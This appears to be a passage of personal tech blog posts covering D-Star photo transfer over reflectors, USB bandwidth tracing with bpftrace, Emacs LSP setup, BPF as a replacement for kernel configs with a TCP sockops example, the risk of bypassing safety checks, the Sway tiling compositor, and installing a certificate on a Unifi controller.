I arbitrarily named my reflector XLX949, but I would only be connecting to it by DNS name anyway, so it doesn’t matter.

I used an OpenSpot2 to connect the D74 to this reflector.

On the IC9700 I set it to Terminal Mode (where it’s just an expensive interface to the Internet, no RF at all), and connected it to the VM I’d set up. I got everything rejected until I set my settings to:

  • My station: 2E0VMB (my Intermediate license call sign)
  • Gateway callsign: 2E0VMB A
  • Your call: /XLX949B
  • R2: 2E0VMB G
  • R1: 2E0VMB A

Then it worked, and I could send pictures so that they would go:

IC9700->my reflector->OpenSpot2->D74->Android Phone

By the way, very few reflectors support radios in Terminal Mode (seems only XLX227D and XLX555A,B,C,D). Here are the standard XLX reflector addresses though.

Via a real repeater and reflector

My local repeater was connected to DCS005B, so I connected my OpenSpot2 to that too, and put the IC9700 in Normal Mode.

I could not get the double-speed TX ALL to work through this. I’m guessing either the repeater or reflector doesn’t want full data without voice. So I used the normal Pict TX, and talked through the transmission.

Obviously I listened first to make sure I wasn’t interrupting anything, and used small low quality photo settings so that I wouldn’t tie up the reflector and all connected repeaters for too long.

Anyway, this worked right away, and my new path was:

IC9700->My local repeater (GB7OK)->Reflector (DCS005B)->OpenSpot2->D74->Android phone

But why

This means when phone service is down or just doesn’t have coverage I’d be able to send and receive photos. Even using just what I’d have in my pockets. And when phone service is unavailable, that’s when you really want to be able to communicate, to help yourself or others. As long as the nearby D-Star repeater has Internet access, that communication is world wide.

Measuring USB with bpftrace

File usb-bw.b:

#include <linux/usb.h>

interval:s:1 {
  printf("--------------------------\n");
  print(@total);
  print(@sum);
  clear(@sum);
  clear(@total);
}

kprobe:__usb_hcd_giveback_urb {
  $urb = (struct urb*)arg0;
  $dev = $urb->dev;
  @total = stats((uint64)$urb->actual_length);
  @sum[$dev->descriptor.idVendor,
       $dev->descriptor.idProduct,
       str($dev->product),
       str($dev->manufacturer)] = stats((uint64)$urb->actual_length);
}

Example run with a USB stick idling (appears to be probed once every two seconds), and starting and stopping some GNURadio sniffing with a USRP B200 at 10Msps:

$ sudo bpftrace usb-bw.b
Attaching 2 probes...
--------------------------
@total: count 317, average 20, total 6641

@sum[9472, 32, USRP B200, Ettus Research LLC]: count 315, average 20, total 6597
@sum[4871, 357, USB Mass Storage Devie, USBest Technology]: count 2, average 22, total 44

--------------------------
@total: count 6807, average 20, total 136552

@sum[9472, 32, USRP B200, Ettus Research LLC]: count 6807, average 20, total 136552

--------------------------
@total: count 8507, average 20, total 170852

@sum[9472, 32, USRP B200, Ettus Research LLC]: count 8505, average 20, total 170808
@sum[4871, 357, USB Mass Storage Devie, USBest Technology]: count 2, average 22, total 44

--------------------------
@total: count 979, average 20, total 20288

@sum[9472, 32, USRP B200, Ettus Research LLC]: count 979, average 20, total 20288

--------------------------
@total: count 2141, average 7319, total 15670428

@sum[4871, 357, USB Mass Storage Devie, USBest Technology]: count 2, average 22, total 44
@sum[9472, 32, USRP B200, Ettus Research LLC]: count 2140, average 7326, total 15678560

--------------------------
@total: count 5077, average 7891, total 40066648

@sum[9472, 32, USRP B200, Ettus Research LLC]: count 5078, average 7890, total 40066648

--------------------------
@total: count 5080, average 7888, total 40074868

@sum[4871, 357, USB Mass Storage Devie, USBest Technology]: count 2, average 22, total 44
@sum[9472, 32, USRP B200, Ettus Research LLC]: count 5079, average 7890, total 40074824

--------------------------
@total: count 5077, average 7891, total 40066648

@sum[9472, 32, USRP B200, Ettus Research LLC]: count 5077, average 7891, total 40066648

--------------------------
@total: count 2456, average 8009, total 19670524

@sum[4871, 357, USB Mass Storage Devie, USBest Technology]: count 2, average 22, total 44
@sum[9472, 32, USRP B200, Ettus Research LLC]: count 2455, average 8015, total 19678656
--------------------------


--------------------------
@total: count 2, average 22, total 44

@sum[4871, 357, USB Mass Storage Devie, USBest Technology]: count 2, average 22, total 44

It’s not the prettiest, but it’s interesting. Note that the Product and Vendor IDs are in decimal. I couldn’t find a way to convert them to hex in bpftrace.
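
Since bpftrace prints the map keys in decimal, one option is to convert them afterwards, outside bpftrace. Here is a minimal sketch in Python that formats the IDs as the usual four-digit hex pair and turns a per-second byte total into MB/s. The helper names `usb_id` and `mbytes_per_second` are made up for this example, and the one-second interval is taken from the `interval:s:1` probe above.

```python
def usb_id(vendor: int, product: int) -> str:
    """Format decimal USB vendor/product IDs as vvvv:pppp in hex."""
    return f"{vendor:04x}:{product:04x}"


def mbytes_per_second(total_bytes: int, interval_s: float = 1.0) -> float:
    """Convert a byte total for one reporting interval into MB/s."""
    return total_bytes / interval_s / 1e6


# Keys copied from the example run above.
print(usb_id(9472, 32))    # 2500:0020
print(usb_id(4871, 357))   # 1307:0165

# One of the busy intervals from the example run.
print(round(mbytes_per_second(40066648), 1))  # 40.1
```

About 40 MB/s is roughly what 10Msps would need at 4 bytes per sample. That sample size is an assumption (16-bit I and Q), not something the trace itself shows.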


A smarter emacs


I’ve been running Emacs for like 25 years. But I’ve never really configured it with anything fancy.

Sure, I’ve set some shortcut keys, and enabled global-font-lock-mode and set indent size, but that’s almost it.

All my coding is done in tmux&Emacs. One project gets exactly one tmux session. Window 0 is emacs. Window 1 is make && ./a.out (sometimes split panes to tail logs or run both server and client), and to run git commands. The remaining windows are used for various things like reading manpages etc….

I have that same workflow whether I’m editing a blog post or doing kernel programming.

This way I can work at my desk with large and plentiful screens, and then move to my laptop and everything continues working exactly the same.

I’ve customized tmux, but not done much with Emacs.

So, step one to get my coding environment to be less 1995, and more 2020: make my editor understand my code, and show me stuff about it.

I’m learning as I’m going, and writing what I’m learning. As always if you see something wrong then please leave a comment.

Code annotations and other semantic understanding

The way to do this is to make your editor talk the Language Server Protocol (LSP) with something that understands the language. For C++ that’s clangd.

apt install clangd lsp-mode

Then we need to make this LSP thingy understand how to compile the code. That’s a bit tricky since there may be system-local defines and stuff. You may have had to provide flags to ./configure to make it build.

This information needs to end up in a file called compile_commands.json
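
For reference, compile_commands.json is a JSON array with one entry per source file, telling the tooling which directory and command line were used to compile it. The sketch below builds one such entry by hand in Python, only to show the shape of the file. The project path, source file and flags are invented for illustration, and in practice a tool generates the file for you.

```python
import json


def compile_db_entry(directory: str, source: str, flags: list[str]) -> dict:
    """Build one compilation database entry for a single source file."""
    return {
        "directory": directory,
        "file": source,
        "arguments": ["c++", *flags, "-c", source],
    }


# Hypothetical project layout and flags, for illustration only.
entries = [
    compile_db_entry(
        "/home/user/project",
        "src/main.cc",
        ["-std=c++17", "-Iinclude", "-DHAVE_CONFIG_H"],
    )
]

print(json.dumps(entries, indent=2))
```

The point is that system-local defines and include paths end up in the arguments, which is why the file has to come from a real build.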

The way I found to do this is using scan-build.

pip install scan-build
cat >> Makefile.am
lsp:
	~/.local/bin/intercept-build make
^D
./bootstrap.sh && ./configure && make clean && make lsp

Now we just need to activate it in Emacs. That’s done by (lsp t). But better yet, let’s trigger it when loading C++ code.

Let’s add this to ~/.emacs.d/init.el:

(add-hook 'c++-mode-hook 'development-mode)
(defun development-mode ()
  "Start dev stuff"
  (interactive)
  (lsp t)
  (setq show-trailing-whitespace t)
  (setq indent-tabs-mode nil))

Ok, that looks WHAT THE FUCK?!

Ugly colors

Ok, after some searching let’s add this to ~/.emacs.d/init.el too:

Good colors

Ok, that’s better. And we get nice context aware tab completion. Ok, now I feel like I’ve joined the 21st century.

Auto-format code on save

clang again comes to the rescue. Specifically clang-format.

apt install clang-format

And more for ~/.emacs.d/init.el:

(defun clang-format-save-hook-for-this-buffer ()
  "Create a buffer local save hook."
  (add-hook 'before-save-hook
    (lambda ()
      (progn
        (when (locate-dominating-file "." ".clang-format")
          (clang-format-buffer))
        ;; Continue to save.
        nil))
    nil
    ;; Buffer local hook.
  t)
)
(add-hook 'c++-mode-hook (lambda () (clang-format-save-hook-for-this-buffer)))

From Stackoverflow.

Summary

There, now I’ve advanced the state of my programming environment by about 20 years. If you were already doing this in 1995, then good for you.

BPF: The future of configs


BPF has some wow-presentations, showing how it enables new performance measuring and tracing. Brendan Gregg has a whole bunch, for example. But I don’t think it’s very well explained just why BPF is such a big deal.

Most of the demos are essentially cool and useful looking tools, with an “oh by the way BPF made this happen”. Similar to how it’s common to see announcements about some software, where the very title of the announcement ends with “written in Go”. It gives a vibe of “so what?”.

If you’re interested in system tooling and configuration, and aren’t already aware of BPF, then this is for you.

I’m not an expert on BPF, but this will hopefully help someone else bootstrap faster.

bpftrace

bpftrace is really cool. Clearly it’s inspired by dtrace. But one should not mistake bpftrace for BPF. bpftrace is only yet another tool that uses BPF, albeit one that allows you to create trace points in a domain specific language.

This is not the full power of BPF. It’s not at all the big picture.

BPF and configs

Let’s take packet filtering as an example. Once upon a time in Linux there was ipfwadm. I bet there are people reading this who were not born when we moved off of that. Hell, its sequel ipchains is not exactly new either. After that came iptables. iptables still works, and is probably the most popular still, but technically it’s replaced by nftables.

What all these have in common is that they are configs. They’re data. They provide a list of rules, and a rule engine goes through the rules, one by one, and finds a “matching rule” and performs an “action”.

In other words the user starts with an intent, and encodes that in a configuration, which in turn is checked for every packet.

The problem with that is if something cannot be encoded in the config, then it’s not possible to make the packet filter do it. Sure, every generation of tooling made more things possible to configure, but it’ll never be complete.

OpenBSD has instead improved and expanded what pf can do, but there too you are at the mercy of what’s possible to encode in the configuration.

E.g. what if you want to filter all packets whose source and destination ports are the same? The only option I can think of is to create 65536 separate rules (times two for TCP/UDP), which is not only messy, but also affects performance, since they’ll be evaluated for every packet sequentially.

Classic solution

The classic solution to these special configurations is to add an interface between userspace and the kernel, and have the kernel ask a daemon what to do.

This has many drawbacks:

  • what should happen if the userspace daemon crashes?
  • userspace/kernel context switches are expensive, and here we need two of them per packet
  • Both sides have to be configured. The kernel needs a configuration to know it’s supposed to ask userspace, and userspace needs to “connect” to that.
  • Complex kernel/userspace interfaces are where kernel bugs happen
  • Ok, that’s great for iptables. But what about all the other configs? Should they all create this type of link?

BPF solution

BPF does not deal in configuration, but in code. BPF allows you to load code into the kernel (in a safe way), and you’re not constrained by what can be encoded in rules.

For our example you don’t tell the kernel to drop packets with source port equal to destination port. Instead you upload a program that hooks into “packet received”, and tell the kernel to run this code to decide what to do with each packet.
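
To make the contrast concrete, here is a rough model of the two approaches in plain Python. This is not BPF and not a real packet filter, and the `Packet` type and function names are invented for the example. It only shows that the intent needs 131072 sequential rules as data, but a single comparison as code.

```python
from typing import NamedTuple


class Packet(NamedTuple):
    proto: str
    src_port: int
    dst_port: int


# Config approach: one rule per (protocol, port) pair, checked one by one.
RULES = [(proto, port) for proto in ("tcp", "udp") for port in range(65536)]


def drop_by_rules(pkt: Packet) -> bool:
    """Walk the rule list sequentially, like a classic rule engine."""
    for proto, port in RULES:
        if pkt.proto == proto and pkt.src_port == port and pkt.dst_port == port:
            return True
    return False


# Code approach: the same intent expressed directly.
def drop_by_code(pkt: Packet) -> bool:
    """Drop when source and destination port are equal."""
    return pkt.src_port == pkt.dst_port


print(len(RULES))  # 131072
print(drop_by_rules(Packet("udp", 53, 53)), drop_by_code(Packet("udp", 53, 53)))
```

Both functions give the same verdict for TCP and UDP packets, but only the second stays the same size when the intent gets more complicated.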

There’s even bpftables now. I wouldn’t say that it completely removes the need for iptables & nftables, but it removes the need for the kernel portion of them. iptables/nftables userspace could compile to BPF, and all rule processing code could be removed from the kernel.

And so it goes for all configurations and settings.

This is a big deal.

Taking this to the extreme

You could remove the routing table code from the kernel (a routing table is a configuration), and have a BPF program decide the next hop. This may sound strange to you, but if you’ve ever done policy routing under Linux, with ip rule and numbered routing tables, then this may make more sense.

Maybe more realistic is to rip out the support for more than the default routing table, and allow creation of userspace domain specific languages that just upload the code to the kernel.

You could implement filesystem access controls in a BPF program, and rip out unix filesystem permissions code. Maybe not a good idea, but you could.

Did you know that in Linux you can customize the TCP initial congestion window and receive window by applying attributes to the routing table entry? That’s clever. But if you want to set the cwnd based on port, then the “cleanest” way is probably to use iptables to -j MARK packets on those ports, then ip rule to change routing table, and then create a new routing table as a copy of the default one but with these settings changed. And remember to update both tables when you need to change one. I said “cleanest”, not clean.

With BPF you can just hook into sockops on the BPF_SOCK_OPS_ACTIVE_ESTABLISHED_CB operation, and change it based on any criteria you want.

What I have actually done with BPF

Measure USB traffic, but the idea has more potential

This uses the bpftrace tool, and thus doesn’t use the full power of BPF. My code in the domain specific language compiles into BPF that hooks into specific function calls in the USB stack.

As I understand it BPF would allow me to hook into those same places and override the function return value. That way I could create a firewall for USB.

Imagine how much work it would be to create a USB firewall without BPF. You would have to:

  • specify a configuration language
  • add a way to upload a config to the kernel
  • create the user language
  • create command line tooling for it
  • convince kernel developers to accept your patches
  • convince distribution vendors to add your tools to the OS

And then it wouldn’t be available on all Linux systems until a few years later when kernels and distributions pick it up.

It would literally take years to make this available to people. With BPF you could do it in a weekend, and other people could start using it without them even needing to reboot.

Set default retransmit time

By default Linux retransmits a SYN packet after 1 second, if there is no response. Then exponentially after 2 more seconds, then 4 more, etc…

While playing with LoRa and AX.25 this timer has caused problems. The problem is that under some settings it can take more than a second (actually in the slowest LoRa mode over 5 seconds) to send the SYN packet. This means that as soon as the SYN is done sending, the retransmit gets sent too. This ties up the radio for another 5 seconds, and likely prevents the reply from being received (my LoRa hardware doesn’t seem to be able to listen before transmit (LBT), and therefore doesn’t do CSMA).
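
The timing problem can be sketched with a few lines of Python. This only models the doubling backoff described above, not the real kernel logic, and the function names and the attempt count are chosen for the example.

```python
def syn_send_times(initial_rto: float, attempts: int) -> list[float]:
    """Seconds after the first SYN at which each SYN (re)transmission is sent."""
    times = [0.0]
    rto = initial_rto
    for _ in range(attempts - 1):
        times.append(times[-1] + rto)
        rto *= 2  # exponential backoff
    return times


def queued_during_airtime(initial_rto: float, airtime: float, attempts: int = 6) -> int:
    """Count retransmits that fire before the first SYN has finished sending."""
    return sum(1 for t in syn_send_times(initial_rto, attempts)[1:] if t < airtime)


print(syn_send_times(1.0, 5))            # [0.0, 1.0, 3.0, 7.0, 15.0]
print(queued_during_airtime(1.0, 5.0))   # 2
print(queued_during_airtime(20.0, 5.0))  # 0
```

With a 1 second initial timeout and 5 seconds of airtime, two retransmits are already queued before the first SYN is even done. With a 20 second initial timeout there are none.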

I wouldn’t say that the interface is intuitive (it took me a few hours to find a way to compile and load the code), but once you know how, it’s simple.

#include <linux/bpf.h>
#define SEC(NAME) __attribute__((section(NAME), used))

// TODO: assumes little-endian (x86, amd64)
#define bpf_ntohl(x)  __builtin_bswap32(x)

SEC("sockops")
int bpf_sockmap(struct bpf_sock_ops *skops)
{
  skops->reply = -1;
  // TODO: filter on outgoing interface
  if (bpf_ntohl(skops->remote_port) != 12345 && skops->local_port != 12345) {
    return 0;
  }

  const int op = (int) skops->op;
  if (op == BPF_SOCK_OPS_TIMEOUT_INIT) {
     // TODO: this is in jiffies, and despite `getconf CLK_TCK` returning 100, HZ is clearly 250 on my kernel.
     // 5000 / 250 = 20 seconds
     skops->reply = 5000;
     return 1;
  }
  return 0;
}
char _license[] __attribute((section("license"),used)) = "GPL";
int _version SEC("version") = 1;
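
The reply value is in jiffies, so what it means in seconds depends on the kernel’s HZ. A tiny Python sketch of the conversion, assuming HZ is 250 as in the arithmetic in the comment (the helper names are made up):

```python
def jiffies_to_seconds(jiffies: int, hz: int) -> float:
    """Convert a jiffies count to seconds for a kernel ticking at hz."""
    return jiffies / hz


def seconds_to_jiffies(seconds: float, hz: int) -> int:
    """Convert seconds to the nearest whole number of jiffies."""
    return round(seconds * hz)


print(jiffies_to_seconds(5000, 250))  # 20.0
print(seconds_to_jiffies(20, 250))    # 5000
```

On a kernel with a different HZ the same 5000 would give a different timeout, which is what the TODO is about.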

Compile & load using clang (apt install clang llvm) and bpftool (kernel sources in tools/bpf/bpftool):

# I needed kernel headers. Preferably for the kernel you're actually running.
CFLAGS="-I/usr/src/linux-source-4.19/usr/include/"
# Compile
clang $CFLAGS -target bpf  -Wall -g -O2 -c set_rto.c -o set_rto.o
# Remove any previous version from the kernel
sudo bpftool cgroup detach "/sys/fs/cgroup/unified/" sock_ops pinned "/sys/fs/bpf/bpf_sockop"
sudo rm -f /sys/fs/bpf/bpf_sockop
# Load the new version.
sudo bpftool prog load set_rto.o  /sys/fs/bpf/bpf_sockop
sudo bpftool cgroup attach /sys/fs/cgroup/unified/ sock_ops pinned /sys/fs/bpf/bpf_sockop
  • https://github.com/zachidan/ebpf-sockops
  • Brendan Gregg
  • https://fly.io/blog/bpf-xdp-packet-filters-and-udp/
  • https://github.com/iovisor/bcc/blob/master/docs/reference_guide.md
  • https://technodocbox.com/91371073-Internet_Technology/Tcp-bpf-programmatically-tuning-tcp-behavior-through-bpf.html

Bypassing safety check for an obviously safe change


This is less concretely technical than my usual blog post.

For every 100 changes we’re 99% sure won’t cause an outage, one will

It’s actually hard to be 99% sure of anything. I’m not 99% sure today’s Thursday. I say that because more often than one day in a hundred, I’ll think “hmm… feels like Wednesday” when it’s not.

I just closed my eyes and tried to remember what time it is. I don’t think I can guess with 99% accuracy what hour I’m in. (but to be fair, it’s de-facto Friday afternoon today, as I’m off tomorrow).

Anyway… the reason I say this is that it should be kept in mind every time someone comes and says they want to circumvent some process for a change that they are absolutely sure won’t cause an outage. That certainty can actually be put into numbers. And those numbers are “you are not 100% sure of anything”.

By saying you are 99% sure this won’t cause an outage (and are you right about that?) you are saying that for every 100 requests like yours that bypass normal checks, there will on average be one outage. You are taking on an amortized 1% of the cost of an outage for your change by bypassing the safety barriers.
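
The arithmetic is simple enough to sketch in Python. It assumes every bypassed change has the same chance of going wrong, independently of the others, which is a simplification, and the function names are invented for the example.

```python
def expected_outages(bypasses: int, confidence: float) -> float:
    """Average number of outages among changes that skipped the checks."""
    return bypasses * (1.0 - confidence)


def chance_of_any_outage(bypasses: int, confidence: float) -> float:
    """Probability that at least one of the bypassed changes causes an outage."""
    return 1.0 - confidence ** bypasses


print(round(expected_outages(100, 0.99), 2))      # 1.0
print(round(chance_of_any_outage(100, 0.99), 2))  # 0.63
```

So 100 bypasses at “99% sure” means one outage on average, and about a 63% chance of at least one.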

And now I realize where my thinking of this comes from. It’s from Eliezer Yudkowsky on Infinite Certainty.

Or is it? I can’t be 100% sure…

Tiling window manager


A couple of months ago it occurred to me that I’ve been manually tiling my windows. That is, I use all the screen real estate, and don’t have windows overlapping each other.

In various window managers (and on Windows) I have used Super+Left and Super+Right to divide the screen 50/50.

So why am I not running a tiling window manager? That’s literally what they do, and they allow more flexibility in how to tile, without wasting space.

Switching to tiling

A quick googling says that i3 is what I want. Fast, small, efficient. No bells and whistles.

I used it for a little while, but then because I wanted to make it even harder on myself, err… I mean to join the 21st century, I thought I’d switch from X11 to Wayland, too. Luckily there’s a Wayland Compositor that’s equivalent to the i3 Window Manager called Sway.

It’s great! I knew X11 and Gnome had issues, but I didn’t realize just how much better I feel when I don’t have to deal with their deficiencies.

Like:

  • screen tearing when scrolling in terminal windows
  • changing focus can take up to a second, sometimes
  • X11 resets keyboard settings when it bloody feels like it, in addition to every single time you plug/unplug a keyboard

Wayland’s not been entirely smooth sailing though:

Terminals

Now that the biggest issues with performance were gone, it became more noticeable that gnome-terminal is pretty slow too. Reading my email in my text client I noticed that merely scrolling through an email could take 45% CPU on a modern machine. That’s ridiculous, even if it’s a full height window on a 4k monitor, thus many pixels.

At first I thought it was due to my email client not being efficient at rendering. After all, it redraws the whole text buffer from scratch when you scroll. So I implemented scrolling using terminal escape codes.

Curiously that didn’t help at all. Oh well, at least it improves screen tearing on X11, and reduces network use when run through SSH.

I got a recommendation to use the terminal foot. Terrible name. But in the spirit of i3 and Sway (and being native Wayland), it looked pretty neat. And yes, much faster.

I had to adjust the colors. The default ones were very muted.

One major drawback though is that it does not support tabs. But Sway does support tabs for windows, so why do I need tabs both in the WM (ehem, compositor) and in the terminal?

After trying it as-is, it turns out that I really want to be able to cycle through the tabs inside the same “visual space”, and moving to another window is something else to me entirely. Similar to how when I move away from the browser window, I move away from all the browser tabs, but moving between browser tabs is a completely different conceptual thing.

What I want shortcuts for:

  • “if focus is inside a tabbed container, go out of that tabbed container and to the left” (or up, down, right, whatever)
  • “go to the next tab. If it’s the last tab, cycle back to the first one”
  • “jump directly to tab number N”

Neither foot nor Sway support this. But Sway supports dumping a JSON representation of the layout, and it supports sending navigation commands.

So I made a shell script that takes the JSON layout, locates the currently focused window, and does what I want.
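
The idea can be sketched in Python. This is not the actual script, just an illustration of the “next tab, with wraparound” case. It assumes the layout tree has the shape that `swaymsg -t get_tree` prints (nested `nodes`, a `focused` flag, a `layout` field and an `id`), and the sample tree and function names are made up.

```python
import json


def path_to_focused(node, path=()):
    """Return the chain of nodes from the root down to the focused one."""
    path = path + (node,)
    if node.get("focused"):
        return path
    for child in node.get("nodes", []):
        found = path_to_focused(child, path)
        if found:
            return found
    return None


def next_tab_command(tree):
    """Build a Sway command that focuses the next tab, cycling at the end."""
    path = path_to_focused(tree)
    if path is None:
        return None
    # Walk upwards from the focused node to the nearest tabbed container.
    for depth in range(len(path) - 2, -1, -1):
        container = path[depth]
        if container.get("layout") == "tabbed":
            ids = [tab["id"] for tab in container["nodes"]]
            current = ids.index(path[depth + 1]["id"])
            target = ids[(current + 1) % len(ids)]
            return f"[con_id={target}] focus"
    return None


# Hand-written stand-in for real get_tree output.
SAMPLE = json.loads("""
{"id": 1, "layout": "splith", "nodes": [
  {"id": 2, "layout": "tabbed", "nodes": [
    {"id": 3, "name": "foot", "nodes": []},
    {"id": 4, "name": "foot", "focused": true, "nodes": []}
  ]},
  {"id": 5, "name": "emacs", "nodes": []}
]}
""")

print(next_tab_command(SAMPLE))  # [con_id=3] focus
```

In real use the tree would come from `swaymsg -t get_tree`, and the resulting command string would be handed back to `swaymsg`.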

I felt kinda icky having Sway execute my script, which in turn does three more exec() calls (and all the other syscalls to fork() and shuffle data between them), just to “focus next window”. Running the script took about 50ms, too. Not really a problem, but could be noticeable on a loaded system with many more windows.

So I rewrote it in C++, using simdjson. Turns out the JSON parsing and querying of jq was the biggest time thief. But now it’s so fast that time often claims it used 0.000s of CPU time.

Possibly the jq query could be optimized, but I wanted to not even waste time loading four binaries (swaymsg, bash, jq, and swaymsg again) to select the next window. I don’t even particularly like the one exec() call.

And now I can configure moving around the way I want it.

And if I have other fancy nav things I want to do I have the library to get started.

In conclusion

I highly recommend tiling window managers, and i3 and Sway in particular. I run Sway both on my laptop and on my dual monitor desktop. Sway also handles unplugging/replugging the extra monitor much better, where Gnome just left a horrible mess.

And I recommend simdjson for all your JSON parsing needs. It’s really fast, and has a nice modern C++ API.

Unifi controller with a real cert


I finally got sick of seeing a certificate error when connecting to my Ubiquiti Unifi WiFi controller.

There are a bunch of shitty howtos describing how to install a cert, and one good one. But in order to make it more copy-paste for future me when the certificate needs renewing, and because the paths are not quite the same since I run the controller in a Docker container on a Raspberry Pi, here are the commands (after copying fullchain.pem and privkey.pem into the stateful data dir):

host$ docker ps  # make note of the docker ID
host$ docker exec -ti ID_HERE bash
docker$ openssl pkcs12 \
        -export \
        -inkey privkey.pem \
        -in fullchain.pem \
        -out cert.p12 \
        -name unifi \
        -password pass:secret
docker$ keytool \
        -importkeystore \
        -deststorepass aircontrolenterprise \
        -destkeypass aircontrolenterprise \
        -destkeystore /usr/lib/unifi/data/keystore \
        -srckeystore cert.p12 \
        -srcstorepass secret \
        -alias unifi \
        -noprompt
docker$ exit
host$ docker stop ID_HERE
host$ docker start ID_HERE

I’m mostly happy with the Ubiquiti access points. I have an AP-AC-LR and an AP-M. My complaints are:

  • When I reported a bug about access to SSH on non-management interfaces, they responded by turning off management over IPv6 altogether.
  • Even their latest firmware doesn’t support UNII-3 channels, which have been allowed in UK since 2017, and DFS-free since mid-2020.
  • You can’t select fallback channel when DFS channels detect radar, so you may end up with both APs on the same channel.

I solved some of the channel mess by creating two “sites”. One “in the US” running on UNII-3, and since it’s DFS-free there’s no risk of both APs ending up on the same channel.

This works great for everything except:

  • Google Pixelbook
  • Google Nest
  • Google Chromecast

They absolutely refuse to connect to a UNII-3 channel. Apparently because the manufacturer chose to hard code this, non-upgradable, and not simply trust the AP. So I just live with them connecting to the other AP. My home is not that big.

Apple devices, Pixel 3 phone, Lenovo etc… etc… are all fine.
